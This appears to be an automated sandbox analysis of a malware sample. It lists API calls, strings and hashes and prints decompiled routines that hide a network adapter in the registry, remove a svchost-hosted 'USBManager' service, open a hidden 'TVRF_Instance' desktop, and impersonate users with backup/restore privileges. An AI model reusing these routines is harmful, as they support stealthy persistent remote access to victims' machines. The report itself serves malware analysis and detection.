                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$AllocLocal$CommandLinePathRelativelstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "%s%s"$-svcr
                                                                                                                        • API String ID: 3712600073-2880469085
                                                                                                                        • Opcode ID: 2a1503044cd5e6b322d5c8dd0cff3f1a752a07c89fd5e798c3304aaa268aec4c
                                                                                                                        • Instruction ID: f1d01fbdc56259cf6174f3107a5da33c84d4c0a8dae534f5d499deeda9a8a1b6
                                                                                                                        • Opcode Fuzzy Hash: 2a1503044cd5e6b322d5c8dd0cff3f1a752a07c89fd5e798c3304aaa268aec4c
                                                                                                                        • Instruction Fuzzy Hash: C731D033D047A9EBDB10DB64CC4AF5ABBADEB46321F008519F855D7140D7B5E814CBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004FA4B2
                                                                                                                        • select.WS2_32(00000002,00000000,00000001,00000000,?), ref: 004FA573
                                                                                                                        • __WSAFDIsSet.WS2_32(?,00000001), ref: 004FA591
                                                                                                                        • send.WS2_32(?,?,?,00000000), ref: 004FA5A7
                                                                                                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,004FF44D,00000000,00000000,00000000,00000001,000003E8,00000000,0000000C,004DC531), ref: 004FA5B4
                                                                                                                        • shutdown.WS2_32(?,00000001), ref: 004FA5EC
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                          • Part of subcall function 004F9BD8: __EH_prolog3.LIBCMT ref: 004F9BDF
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004D6BAE: __EH_prolog3.LIBCMT ref: 004D6BB5
                                                                                                                        • shutdown.WS2_32(?,00000001), ref: 004FA6CF
                                                                                                                        • shutdown.WS2_32(?,00000001), ref: 004FA6DE
                                                                                                                          • Part of subcall function 004BEF63: __EH_prolog3.LIBCMT ref: 004BEF6A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$shutdown$CriticalSection$DeleteErrorInitializeLastselectsend
                                                                                                                        • String ID: NC.WriteData.Failed1$ NC.WriteData.Failed3$ NC.WriteData.Failed4$ NC.WriteData.Failed5$writeData.Disconnect$writeData.Error.
                                                                                                                        • API String ID: 2406434119-2506857550
                                                                                                                        • Opcode ID: 3955a94e403a0ae63d72d91036d330615ccc19c61c363e1a1c4cf091b1a697a7
                                                                                                                        • Instruction ID: 9b8cd641ee854a4557a035298ed64e4ee21aab65bacbfc74d2b882a06588e5f0
                                                                                                                        • Opcode Fuzzy Hash: 3955a94e403a0ae63d72d91036d330615ccc19c61c363e1a1c4cf091b1a697a7
                                                                                                                        • Instruction Fuzzy Hash: 8C91DCB090020DEFEF10EFA4C8859EE7BB5BF54344F24805EE645AB290D7399E14CB66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004B94F5
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004B91EF: _memset.LIBCMT ref: 004B9216
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalInitializeSection_memset
                                                                                                                        • String ID: Vista$W2K$Win2003$Win2008$Win3.11$Win7$Win95$Win98$Win98SE$Win?$WinMe$WinNT$WinXP
                                                                                                                        • API String ID: 1962156645-467695568
                                                                                                                        • Opcode ID: 959177bbf1b5fb6bcfe7fbab9f4edd01d817295b01b4cdc0533454b81baa8c37
                                                                                                                        • Instruction ID: db7eb224f653a959da8366efe4caee1ed58c755f50c0700b446445da0092859c
                                                                                                                        • Opcode Fuzzy Hash: 959177bbf1b5fb6bcfe7fbab9f4edd01d817295b01b4cdc0533454b81baa8c37
                                                                                                                        • Instruction Fuzzy Hash: 3C71A37490514CEEDB04EF55C891BEDB778AF65784F10408EE10567192EF386F08DBAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334130() {
                                                                                                                        				char _v248;
                                                                                                                        				char _v256;
                                                                                                                        				void* _v260;
                                                                                                                        				char _v264;
                                                                                                                        				void* _t11;
                                                                                                                        				intOrPtr _t12;
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				void* _t37;
                                                                                                                        				void* _t38;
                                                                                                                        
                                                                                                                        				_t11 = E6F333700("USBManager", 1);
                                                                                                                        				_t38 = _t37 + 8;
                                                                                                                        				if(_t11 == 0) {
                                                                                                                        					return _t11;
                                                                                                                        				}
                                                                                                                        				if(M6F340544 != 0) {
                                                                                                                        					_t18 =  *0x6f34047c; // 0xa545e0
                                                                                                                        					wsprintfA( &_v264, "%s\\%s%c%s", _t18, "svchost", 0, 0x6f33d543);
                                                                                                                        					_t38 = _t38 + 0x18;
                                                                                                                        					_v260 = 0;
                                                                                                                        					if(RegCreateKeyExA(0x80000002,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v260, 0) == 0) {
                                                                                                                        						RegDeleteValueA(_v260, "USBManager");
                                                                                                                        						RegCloseKey(_v260);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t12 =  *0x6f34047c; // 0xa545e0
                                                                                                                        				wsprintfA( &_v264, "%s\\%s%c%s", _t12, "svchost", 0x5c, "USBPortsManagerGrp");
                                                                                                                        				RegDeleteKeyA(0x80000002,  &_v256);
                                                                                                                        				wsprintfA( &_v256, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6f33d543);
                                                                                                                        				return RegDeleteKeyA(0x80000002,  &_v248);
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F333700: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F333719
                                                                                                                          • Part of subcall function 6F333700: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F333725
                                                                                                                          • Part of subcall function 6F333700: OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F33373D
                                                                                                                          • Part of subcall function 6F333700: QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F33374F
                                                                                                                          • Part of subcall function 6F333700: ControlService.ADVAPI32(00000000,00000001,?), ref: 6F333764
                                                                                                                          • Part of subcall function 6F333700: QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33377C
                                                                                                                          • Part of subcall function 6F333700: Sleep.KERNEL32(000003E8), ref: 6F33378E
                                                                                                                          • Part of subcall function 6F333700: CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337B5
                                                                                                                          • Part of subcall function 6F333700: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F3337C0
                                                                                                                        • wsprintfA.USER32 ref: 6F33417A
                                                                                                                        • RegCreateKeyExA.ADVAPI32 ref: 6F3341A5
                                                                                                                        • RegDeleteValueA.ADVAPI32(?,USBManager), ref: 6F3341B9
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3341C4
                                                                                                                        • wsprintfA.USER32 ref: 6F3341E6
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6F3341FB
                                                                                                                        • wsprintfA.USER32 ref: 6F334216
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6F334225
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseDeleteOpenwsprintf$HandleManagerQueryStatus$ControlCreateSleepValue
                                                                                                                        • String ID: %s\%s%c%s$SYSTEM\CurrentControlSet%s%s%s$USBManager$USBPortsManagerGrp$\Services\$svchost
                                                                                                                        • API String ID: 2810420714-3733378816
                                                                                                                        • Opcode ID: 2af24fc87cf750e879305d1b3360cf1f72dafd56b1c51f6fd63cda0596b0a156
                                                                                                                        • Instruction ID: 2f59b7d4d38ac84626ff918008f14b1f1464015837a2f811c3e197cbb679d29c
                                                                                                                        • Opcode Fuzzy Hash: 2af24fc87cf750e879305d1b3360cf1f72dafd56b1c51f6fd63cda0596b0a156
                                                                                                                        • Instruction Fuzzy Hash: 2B21E7B3E007A8BBE610DF60CC41FAB37ADEB94719F00850CF65466180E675F518CBAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C8078
                                                                                                                        • _memset.LIBCMT ref: 004C80B4
                                                                                                                        • RevertToSelf.ADVAPI32(00000001,00000001,00000001,?,?,000000A8), ref: 004C80CB
                                                                                                                        • _memset.LIBCMT ref: 004C815F
                                                                                                                        • ImpersonateLoggedOnUser.ADVAPI32(00000001,?,?,000000A8), ref: 004C81EA
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C821A
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C8265
                                                                                                                        Strings
                                                                                                                        • ImpersonateUser: LoadUserProfile failed, xrefs: 004C81B5
                                                                                                                        • ImpersonateUser: GetCurrentUserToken failed, xrefs: 004C811E
                                                                                                                        • ImpersonateUser: RevertToSelf failed, xrefs: 004C80E4
                                                                                                                        • SeBackupPrivilege, xrefs: 004C8171
                                                                                                                        • ImpersonateUser: ImpersonateLoggedOnUser failed, xrefs: 004C8203
                                                                                                                        • SeRestorePrivilege, xrefs: 004C8185
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CurrentThread_memset$CriticalImpersonateInitializeLoggedRevertSectionSelfUser
                                                                                                                        • String ID: ImpersonateUser: GetCurrentUserToken failed$ImpersonateUser: ImpersonateLoggedOnUser failed$ImpersonateUser: LoadUserProfile failed$ImpersonateUser: RevertToSelf failed$SeBackupPrivilege$SeRestorePrivilege
                                                                                                                        • API String ID: 2442580533-1466847920
                                                                                                                        • Opcode ID: 76841f0a048f3e1c3ad89a4aa9df7d6e94aebd2734ea7ec55061e87b3b8a9547
                                                                                                                        • Instruction ID: 3ca44e481f02f0b0749d78344e7c9914928ca7f834ac87af0ed759489b04262c
                                                                                                                        • Opcode Fuzzy Hash: 76841f0a048f3e1c3ad89a4aa9df7d6e94aebd2734ea7ec55061e87b3b8a9547
                                                                                                                        • Instruction Fuzzy Hash: 915147B4804388AEEB21EF65C886FAE7FB4AF55304F14805EF48557292DB385A44CB66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334300() {
                                                                                                                        				char _v264;
                                                                                                                        				char _v364;
                                                                                                                        				int _v368;
                                                                                                                        				int _v372;
                                                                                                                        				char _v376;
                                                                                                                        				int _v380;
                                                                                                                        				int _v384;
                                                                                                                        				char _v388;
                                                                                                                        				int _v392;
                                                                                                                        				int _v396;
                                                                                                                        				int _v400;
                                                                                                                        				void* _v404;
                                                                                                                        				void* _v408;
                                                                                                                        				int _t49;
                                                                                                                        				int _t66;
                                                                                                                        				char* _t68;
                                                                                                                        				CHAR* _t83;
                                                                                                                        				int _t90;
                                                                                                                        
                                                                                                                        				_t68 = M6F340584; // 0x751730
                                                                                                                        				_t90 = 0;
                                                                                                                        				_v404 = 0;
                                                                                                                        				if(RegOpenKeyExA(0x80000002, _t68, 0, 0xf003f,  &_v404) != 0) {
                                                                                                                        					L18:
                                                                                                                        					return _t90;
                                                                                                                        				}
                                                                                                                        				_v396 = 0;
                                                                                                                        				_v372 = 0;
                                                                                                                        				_v368 = 0;
                                                                                                                        				_v384 = 0;
                                                                                                                        				if(RegQueryInfoKeyA(_v404, 0, 0, 0,  &_v396,  &_v372, 0,  &_v368,  &_v384, 0, 0, 0) != 0) {
                                                                                                                        					L17:
                                                                                                                        					RegCloseKey(_v404);
                                                                                                                        					goto L18;
                                                                                                                        				}
                                                                                                                        				_t49 = _v396;
                                                                                                                        				if(_t49 <= 0) {
                                                                                                                        					goto L17;
                                                                                                                        				}
                                                                                                                        				_t66 = 0;
                                                                                                                        				if(_t49 <= 0) {
                                                                                                                        					L16:
                                                                                                                        					goto L17;
                                                                                                                        				} else {
                                                                                                                        					do {
                                                                                                                        						_v380 = 0x104;
                                                                                                                        						if(RegEnumKeyExA(_v404, _t66,  &_v264,  &_v380, 0, 0, 0, 0) != 0) {
                                                                                                                        							goto L14;
                                                                                                                        						}
                                                                                                                        						_v408 = 0;
                                                                                                                        						if(RegOpenKeyExA(_v404,  &_v264, 0, 0x2001b,  &_v408) != 0) {
                                                                                                                        							goto L14;
                                                                                                                        						}
                                                                                                                        						_v392 = 1;
                                                                                                                        						_v400 = 0x64;
                                                                                                                        						if(RegQueryValueExA(_v408, "ComponentId", 0,  &_v392,  &_v364,  &_v400) == 0) {
                                                                                                                        							_t83 = M6F3404D8; // 0xa55cd8
                                                                                                                        							if(lstrcmpiA( &_v364, _t83) == 0) {
                                                                                                                        								_v400 = 4;
                                                                                                                        								_v392 = 4;
                                                                                                                        								_v388 = 0;
                                                                                                                        								if(RegQueryValueExA(_v408, "Characteristics", 0,  &_v392,  &_v388,  &_v400) == 0) {
                                                                                                                        									_v376 = 0x89;
                                                                                                                        									if(_v388 == 0x89 || RegSetValueExA(_v408, "Characteristics", 0, 4,  &_v376, 4) == 0) {
                                                                                                                        										_t90 = 1;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						CloseHandle(_v408);
                                                                                                                        						if(_t90 != 0) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						L14:
                                                                                                                        						_t66 = _t66 + 1;
                                                                                                                        					} while (_t66 < _v396);
                                                                                                                        					goto L16;
                                                                                                                        				}
                                                                                                                        			}






















                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00751730,00000000,000F003F,?,770CC740,00000000), ref: 6F334327
                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 6F334365
                                                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 6F3343B0
                                                                                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,0002001B,00000000), ref: 6F3343DA
                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,ComponentId,00000000,?,?,00000000), ref: 6F334412
                                                                                                                        • lstrcmpiA.KERNEL32(?,00A55CD8), ref: 6F334424
                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,Characteristics,00000000,?,?,00000000), ref: 6F334459
                                                                                                                        • RegSetValueExA.ADVAPI32(00000000,Characteristics,00000000,00000004,?,00000004), ref: 6F334482
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F334496
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3344B2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen$EnumHandleInfolstrcmpi
                                                                                                                        • String ID: Characteristics$ComponentId$d
                                                                                                                        • API String ID: 678791777-1822972205
                                                                                                                        • Opcode ID: 31d82e66935873b71812a413b74a5c9315cf185cd1fafc2d6f0e27d70917d8e5
                                                                                                                        • Instruction ID: 72e184dfbda02b7c6a03d0ee0fae8ea8f7c766a2a20a2d99791d41e314ad56d3
                                                                                                                        • Opcode Fuzzy Hash: 31d82e66935873b71812a413b74a5c9315cf185cd1fafc2d6f0e27d70917d8e5
                                                                                                                        • Instruction Fuzzy Hash: 8751E0B2608395AFD320DF55D884EABBBFDFBC9B14F00491DB68596104E772E5098B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E6F33A130(void* _a4) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* _t5;
                                                                                                                        				struct HDESK__* _t7;
                                                                                                                        				struct HDESK__* _t13;
                                                                                                                        				void* _t15;
                                                                                                                        
                                                                                                                        				if( *0x6f34027c < 6 || M6F340544 != 0 || M6F340548 == 0) {
                                                                                                                        					if(_a4 == 0) {
                                                                                                                        						return _t5;
                                                                                                                        					} else {
                                                                                                                        						_a4 = 1;
                                                                                                                        						_t7 = GetThreadDesktop(GetCurrentThreadId());
                                                                                                                        						 *0x6f340484 = _t7;
                                                                                                                        						if(_t7 != 0) {
                                                                                                                        							_t7 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
                                                                                                                        							 *0x6f340480 = _t7;
                                                                                                                        							if(_t7 != 0) {
                                                                                                                        								_t15 = CreateThread(0, 0, E6F3396D0, _a4, 0, 0);
                                                                                                                        								if(_t15 != 0) {
                                                                                                                        									WaitForSingleObject(_t15, 0xffffffff);
                                                                                                                        									CloseHandle(_t15);
                                                                                                                        									Sleep(0xfa0);
                                                                                                                        								}
                                                                                                                        								_t13 =  *0x6f340480; // 0x0
                                                                                                                        								return CloseDesktop(_t13);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						return _t7;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_push(__edi);
                                                                                                                        					__eax = CreateEventA(0, 1, 0, "TVRF_Instance");
                                                                                                                        					__edi = __eax;
                                                                                                                        					if(__edi == 0) {
                                                                                                                        						L12:
                                                                                                                        						_pop(__edi);
                                                                                                                        						return __eax;
                                                                                                                        					}
                                                                                                                        					if(GetLastError() == 0xb7) {
                                                                                                                        						__eax = CloseHandle(__edi);
                                                                                                                        						goto L12;
                                                                                                                        					}
                                                                                                                        					__eax = GetCurrentThreadId();
                                                                                                                        					__eax = GetThreadDesktop(__eax);
                                                                                                                        					__ebx = CloseHandle;
                                                                                                                        					 *0x6f340484 = __eax;
                                                                                                                        					if(__eax != 0) {
                                                                                                                        						__eax = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
                                                                                                                        						 *0x6f340480 = __eax;
                                                                                                                        						if(__eax != 0) {
                                                                                                                        							__eax = _a4;
                                                                                                                        							_push(__esi);
                                                                                                                        							__esi = CreateThread(0, 0, E6F339D10, _a4, 0, 0);
                                                                                                                        							if(__esi != 0) {
                                                                                                                        								WaitForSingleObject(__esi, 0xffffffff);
                                                                                                                        								CloseHandle(__esi);
                                                                                                                        								Sleep(0xfa0);
                                                                                                                        							}
                                                                                                                        							__ecx =  *0x6f340480; // 0x0
                                                                                                                        							__eax = CloseDesktop(__ecx);
                                                                                                                        							_pop(__esi);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					__eax = CloseHandle(__edi);
                                                                                                                        					_pop(__edi);
                                                                                                                        					return __eax;
                                                                                                                        				}
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,TVRF_Instance,770CF930,6F33A2BE,00000001,?,?,?,?,?,?), ref: 6F33A163
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 6F33A16F
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F33A17D
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33A186
                                                                                                                        • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6F33A18D
                                                                                                                        • CreateDesktopA.USER32 ref: 6F33A1B4
                                                                                                                        • CreateThread.KERNEL32 ref: 6F33A1D6
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?), ref: 6F33A1E5
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6F33A1EC
                                                                                                                        • Sleep.KERNEL32(00000FA0,?,?,?,?,?,?,?), ref: 6F33A1F3
                                                                                                                        • CloseDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6F33A200
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6F33A208
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateDesktopHandleThread$CurrentErrorEventLastObjectSingleSleepWait
                                                                                                                        • String ID: TVRF_Instance
                                                                                                                        • API String ID: 2944326888-3589830093
                                                                                                                        • Opcode ID: eedc57a1382bf668ba28d078a0f19c4b8f1f075d3e072cac6b6d4a3e601bec31
                                                                                                                        • Instruction ID: bac5d0e4c9355bf7b1ac25f67ff437522f8d4f87fd77d88c8d8bfccc3d769250
                                                                                                                        • Opcode Fuzzy Hash: eedc57a1382bf668ba28d078a0f19c4b8f1f075d3e072cac6b6d4a3e601bec31
                                                                                                                        • Instruction Fuzzy Hash: 1021C077A45BA6ABEF60EB249C48F99376EEB43731F10020DF521952C0CB79E460DA25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E128F
                                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004A1847: __EH_prolog3_GS.LIBCMT ref: 004A184E
                                                                                                                          • Part of subcall function 004A1847: InitializeCriticalSection.KERNEL32(?,00000028,004BF6CE,?,00000000,00784028,00000000), ref: 004A1863
                                                                                                                          • Part of subcall function 004A1847: _swprintf.LIBCMT ref: 004A1881
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$H_prolog3__swprintf$DeleteEnterLeave
                                                                                                                        • String ID: HTTPIN$HTTPPING$HTTP_$PING_ERROR$PING_NOCONNECT$PING_RUNNING$PING_SERVERONLY$PingResult$TCPIN$TCPPING$TCP_
                                                                                                                        • API String ID: 3407804901-2695655189
                                                                                                                        • Opcode ID: 9ddb597525aa8fa8787abcf9a7793391a2a071c3ce2bcfc76f73ef6282eb22d8
                                                                                                                        • Instruction ID: 77eb52bb5fd74d7fbc4ecb358810aabdfbe56e85957c85d4d8cbdc750f51cc6e
                                                                                                                        • Opcode Fuzzy Hash: 9ddb597525aa8fa8787abcf9a7793391a2a071c3ce2bcfc76f73ef6282eb22d8
                                                                                                                        • Instruction Fuzzy Hash: 6AA16F7141418CEADB15EBA4CD91FED7B68BF22308F14809EF446671A2EB786F08C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 005540CD
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 005540E9
                                                                                                                          • Part of subcall function 00542E64: TlsGetValue.KERNEL32(0054B9C9,0054BA49,0054B9C9,00000014,005445B6,00000000,00000FA0,007D5C28,0000000C,00544615,005343D6,?,?,00538380,00000004,007D5840), ref: 00542E71
                                                                                                                          • Part of subcall function 00542E64: TlsGetValue.KERNEL32(00000005,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542E88
                                                                                                                          • Part of subcall function 00542E64: RtlEncodePointer.NTDLL(005343D6,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542EC6
